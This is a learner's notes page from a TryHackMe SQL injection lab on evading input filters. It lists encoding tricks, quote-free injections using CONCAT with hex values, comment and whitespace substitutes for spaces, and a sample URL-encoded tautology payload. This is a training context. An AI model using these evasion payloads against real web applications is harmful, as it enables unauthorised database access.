Filter Evasion

My notes from the Filter Evasion section in the Advanced SQLi room on TryHackme.

Nowadays web apps have deployed security measures to block conventional and normal SQL payloads to protect themselves hence there is a need to use more sophisticated techniques to bypass filters in place and penetrate the systems.

Character Encoding

  • URL Encoding: Can be seen frequently in GET requests. Here characters are replaced by % followed by ASCII values in hex.

  • Hexadecimal Encoding:

  • Unicode Encoding: Unicode escape sequences are used.

No Quote SQLi

The trick here is to use other data types or numbers that don't need quotes. For example ' OR '1'='1 can be used as or 1=1

  • Use CONCAT(): The function can be used to construct strings without quotes. For example CONCAT(0x4b, 0x61, 0x76, 0x69, 0x6e) builds the string Kavin.

No Spaces

Here spaces are replaced by SQL Comments /**/ . This is to bypass filters that block spaces. For example: SELECT * FROM users; gets converted to SELECT/**/*/**/FROM/**/users;

Tab or newline characters i.e \t or \n can also be used instead of spaces.

Characters like %0A, %09 , %0C , %0D or %A0 can also be used.

For example: 1'%250A||%250A1=1- - is the URL encoded payload for 1'%0A||%0A1=1- - . Here special characters are used to bypass the no space filters too.

Important !

No one technique guarantees bypassing any filters or layers of protection hence the key is to use have knowledge on multiple approaches and try everything till something works. Above are some miscellaneous ways to evade filters.

PreviousStored SQLiNextHTTP Header Injection

Last updated